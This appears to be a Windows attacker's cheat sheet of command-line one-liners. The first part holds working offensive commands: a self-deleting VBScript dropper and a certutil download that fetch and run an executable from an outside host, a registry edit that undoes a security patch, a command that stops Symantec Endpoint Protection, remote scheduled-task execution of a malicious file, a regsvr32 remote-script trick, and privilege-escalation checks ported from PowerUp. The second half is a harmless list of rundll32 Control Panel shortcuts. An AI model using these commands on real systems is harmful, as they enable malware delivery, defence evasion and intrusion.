echo Dim HTTPGET >>c:\dl.vbs && echo Set HTTPGET = CreateObject("Microsoft.XMLHTTP") >>c:\dl.vbs && echo HTTPGET.Open "GET", "http://www.illmob.org/test.exe", false >>c:\dl.vbs && echo HTTPGET.Send >>c:\dl.vbs && echo DataBin = HTTPGET.ResponseBody >>c:\dl.vbs && echo Const adTypeBinary=1 >>c:\dl.vbs && echo Const adSaveCreateOverWrite=2 >>c:\dl.vbs && echo Dim SendBinary >>c:\dl.vbs && echo Set SendBinary = CreateObject("ADODB.Stream") >>c:\dl.vbs && echo SendBinary.Type = adTypeBinary >>c:\dl.vbs && echo SendBinary.Open >>c:\dl.vbs && echo SendBinary.Write DataBin >>c:\dl.vbs && echo SendBinary.SaveToFile "c:\test.exe", adSaveCreateOverWrite >>c:\dl.vbs && cscript //Nologo /B c:\dl.vbs && start c:\test.exe && del /s c:\dl.vbs
Re-enable the ADODB stream if patched:
echo Windows Registry Editor Version 5.00 >>c:\fix.reg && echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{00000566-0000-0010-8000-00AA006D2EA4}] >>c:\fix.reg && echo "Compatibility Flags"=- >>c:\fix.reg && regedit /s c:\fix.reg
WebDL using CertUtil
certutil -urlcache -split -f http://illmob.org/test.exe && start test.exe
Mount Windows Share with Null Session
net use x: \\server\share "" /u:
Disable Symantec Endpoint Protection (the path contains spaces, so it must be quoted)
"c:\program files\symantec\symantec endpoint protection\smc" -stop
AT Command Execution
at \\[remote host name or IP address] 12:00 cmd /c "C:\windows\temp\mal.exe"
schtasks /create /tn rb /tr "c:\EVIL.cmd" /sc minute /mo 1 /ru Administrator /rp p455w0rd && schtasks /change /tn rb /ru ""
Run external Windows Script Component (pops calc.exe)
regsvr32 /s /n /u /i:http://bit.ly/1S8dRjL scrobj.dll
Run Sysinternals programs (the live share is \\live.sysinternals.com\tools)
pushd \\live.sysinternals.com\tools && autoruns /accepteula && pause && popd
Find unquoted service paths without access to wmic. You need to run both of these to catch services with spaces in their names:
for /f "tokens=2" %i in ('sc query ^|findstr "SERVICE_NAME"') do sc qc %i | findstr "BINARY_PATH_NAME" >> output.txt
for /f "tokens=2*" %i in ('sc query ^|findstr "SERVICE_NAME"') do sc qc "%i %j" | findstr "BINARY_PATH_NAME" >> output.txt
BatterUp.bat
Check permissions on services
@echo off
REM Batch port of selected modules from PowerUp by harmj0y
REM Author: @_wald0
SETLOCAL ENABLEDELAYEDEXPANSION
REM ======================================
REM = Find unquoted service binary paths =
REM ======================================
echo(
echo Finding unquoted service binary paths...
echo(
for /f "tokens=2* delims=:" %%i in ('sc query ^|findstr "SERVICE_NAME"') do (
set str=%%i
set str=!str:~1!
sc qc "!str!" | findstr "BINARY_PATH_NAME" | findstr /iv "c:\windows\\" | findstr /iv """
)
REM ========================================================================
REM = Check permissions on services                                        =
REM = Technique stolen from PowerUp by harmj0y                              =
REM = https://github.com/HarmJ0y/PowerUp/blob/master/PowerUp.ps1#L104-L141 =
REM ========================================================================
echo(
echo Finding service binaries your user has write access to...
echo(
for /f "tokens=2* delims=:" %%i in ('sc query ^|findstr "SERVICE_NAME"') do (
set str=%%i
set str=!str:~1!
for /f "tokens=4" %%e in ('sc qc "!str!" ^| findstr "ERROR_CONTROL"') do (
set errCtrl=%%e
sc config "!str!" error= !errCtrl! > nul && (
echo Vulnerable service found: !str!
)
)
)
REM =================================================
REM = Check for write access to directories in PATH =
REM =================================================
echo(
echo Finding write access in PATH directories...
echo(
REM http://stackoverflow.com/a/14879373
for %%A in ("%path:;=";"%") do (
set filename=%%~A\dll-write-check.txt
copy /y nul "!filename!" > nul 2>&1 && (
del "!filename!"
echo Writable path directory found: %%A
)
)
Control Panel from Command Line
Control Panel:
rundll32.exe shell32.dll,Control_RunDLL
Accessibility Settings (ACCESS.CPL)
Accessibility Properties (Keyboard):
rundll32.exe shell32.dll,Control_RunDLL access.cpl,,1
Accessibility Properties (Sound):
rundll32.exe shell32.dll,Control_RunDLL access.cpl,,2
Accessibility Properties (Display):
rundll32.exe shell32.dll,Control_RunDLL access.cpl,,3
Accessibility Properties (Mouse):
rundll32.exe shell32.dll,Control_RunDLL access.cpl,,4
Accessibility Properties (General):
rundll32.exe shell32.dll,Control_RunDLL access.cpl,,5
Add/Remove Programs (APPWIZ.CPL)¶
Add/Remove Programs Properties (Install/Uninstall):
rundll32.exe shell32.dll,Control_RunDLL appwiz.cpl,,1
Add/Remove Programs Properties (Windows Setup):
rundll32.exe shell32.dll,Control_RunDLL appwiz.cpl,,2
Add/Remove Programs Properties (Startup Disk):
rundll32.exe shell32.dll,Control_RunDLL appwiz.cpl,,3
Display Settings (DESK.CPL)¶
Display Properties (Background):
rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,0
Display Properties (Screen Saver):
rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,1
Display Properties (Appearance):
rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,2
Display Properties (Settings):
rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,3
Display Properties (Install Screen Saver):
rundll32.exe desk.cpl,InstallScreenSaver %1
(opens .scr at location specified by %1 in preview window)
FindFast Settings (FINDFAST.CPL)¶
Find Fast Properties (General):
rundll32.exe shell32.dll,Control_RunDLL findfast.cpl
Internet Settings (INETCPL.CPL)¶
Internet Properties (General):
rundll32.exe shell32.dll,Control_RunDLL inetcpl.cpl,,0
Internet Properties (Security):
rundll32.exe shell32.dll,Control_RunDLL inetcpl.cpl,,1
Internet Properties (Content):
rundll32.exe shell32.dll,Control_RunDLL inetcpl.cpl,,2
Internet Properties (Connection):
rundll32.exe shell32.dll,Control_RunDLL inetcpl.cpl,,3
Internet Properties (Programs):
rundll32.exe shell32.dll,Control_RunDLL inetcpl.cpl,,4
Internet Properties (Advanced):
rundll32.exe shell32.dll,Control_RunDLL inetcpl.cpl,,5
Regional Settings (INTL.CPL)¶
Regional Settings Properties (Regional Settings):
rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,0
Regional Settings Properties (Number):
rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,1
Regional Settings Properties (Currency):
rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,2
Regional Settings Properties (Time):
rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,3
Regional Settings Properties (Date):
rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,4
Regional Settings Properties (Input Locales):
rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,5
Joystick Settings (JOY.CPL)¶
Joystick Properties (Joystick):
rundll32.exe shell32.dll,Control_RunDLL joy.cpl
Mouse/Keyboard/Printers/Fonts Settings (MAIN.CPL)¶
Mouse Properties:
rundll32.exe shell32.dll,Control_RunDLL main.cpl @0
Keyboard Properties:
rundll32.exe shell32.dll,Control_RunDLL main.cpl @1
Printers:
rundll32.exe shell32.dll,Control_RunDLL main.cpl @2
Fonts:
rundll32.exe shell32.dll,Control_RunDLL main.cpl @3
Mail and Fax Settings (MLCFG32.CPL)¶
Microsoft Exchange/Outlook Properties (General):
rundll32.exe shell32.dll,Control_RunDLL mlcfg32.cpl
Multimedia/Sounds Settings (MMSYS.CPL)¶
Multimedia Properties (Audio):
rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,0
Multimedia Properties (Video):
rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,1
Multimedia Properties (MIDI):
rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,2
Multimedia Properties (CD Music):
rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,3
Multimedia Properties (Advanced/Devices):
rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,4
Sounds Properties:
rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl @1
Modem Settings (MODEM.CPL)¶
Modem Properties (General):
rundll32.exe shell32.dll,Control_RunDLL modem.cpl
Network Settings (NETCPL.CPL / NCPA.CPL)¶
Network (Configuration):
Win9x: rundll32.exe shell32.dll,Control_RunDLL netcpl.cpl
WinNT: rundll32.exe shell32.dll,Control_RunDLL ncpa.cpl
Dial-up Networking Wizard:
Win9x: rundll32.exe rnaui.dll,RnaWizard
Create Share Dialog:
WinNT: rundll32.exe ntlanui.dll,ShareCreate
Manage Shares Dialog:
WinNT: rundll32.exe ntlanui.dll,ShareManage
ODBC Settings (ODBCCP32.CPL)¶
ODBC Data Source Administrator (General):
rundll32.exe shell32.dll,Control_RunDLL odbccp32.cpl
Password Settings (PASSWORD.CPL)¶
Password Properties (Change Passwords):
Win9x: rundll32.exe shell32.dll,Control_RunDLL password.cpl
COM Ports Settings (PORTS.CPL)¶
COM Ports Properties (General):
WinNT: rundll32.exe shell32.dll,Control_RunDLL ports.cpl
Server Properties (SRVMGR.CPL)¶
Server Properties (General):
WinNT: rundll32.exe shell32.dll,Control_RunDLL srvmgr.cpl
System Settings (SYSDM.CPL)¶
System Properties (General):
rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,0
System Properties (Device Manager):
Win9x: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,1
System Properties (Performance):
Win9x: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,3
WinNT: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,1
System Properties (Environment):
WinNT: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,2
System Properties (Startup/Shutdown):
WinNT: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,3
System Properties (Hardware Profiles):
Win95: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,2
WinNT: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,4
System Properties (User Profiles):
WinNT: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,5
Add New Hardware Wizard:
Win9x: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl @1
Add New Printer Wizard:
Win9x: rundll32.exe shell32.dll,SHHelpShortcuts_RunDLL AddPrinter
Telephony Settings (TELEPHON.CPL)¶
Dialing Properties (My Location / Drivers):
WinNT: rundll32.exe shell32.dll,Control_RunDLL telephon.cpl
Themes Settings (THEMES.CPL)¶
Themes Properties (General):
rundll32.exe shell32.dll,Control_RunDLL themes.cpl
Time and Date Settings (TIMEDATE.CPL)¶
Date/Time Properties:
rundll32.exe shell32.dll,Control_RunDLL timedate.cpl
Choose Time Zone:
rundll32.exe shell32.dll,Control_RunDLL timedate.cpl,,/f
TweakUI Settings (TWEAKUI.CPL)¶
TweakUI Dialog (General):
rundll32.exe shell32.dll,Control_RunDLL tweakui.cpl
UPS Settings (UPS.CPL)¶
Uninterruptible Power Supply Properties (General):
WinNT: rundll32.exe shell32.dll,Control_RunDLL ups.cpl
Microsoft Mail Postoffice Settings (WGPOCPL.CPL)¶
Microsoft Workgroup Postoffice Admin:
rundll32.exe shell32.dll,Control_RunDLL wgpocpl.cpl
Miscellaneous File System Dialogs and Wizards¶
Open With (File Associations):
rundll32.exe shell32.dll,OpenAs_RunDLL d:\path\filename.ext
Run Diskcopy Dialog:
rundll32 diskcopy.dll,DiskCopyRunDll
Create New Shortcut Wizard:
rundll32.exe AppWiz.Cpl,NewLinkHere %1
(creates shortcut at location specified by %1)
Create a Briefcase:
rundll32.exe syncui.dll,Briefcase_Create
View Fonts:
rundll32.exe shell32.dll,SHHelpShortcuts_RunDLL FontsFolder
View Printers:
rundll32.exe shell32.dll,SHHelpShortcuts_RunDLL PrintersFolder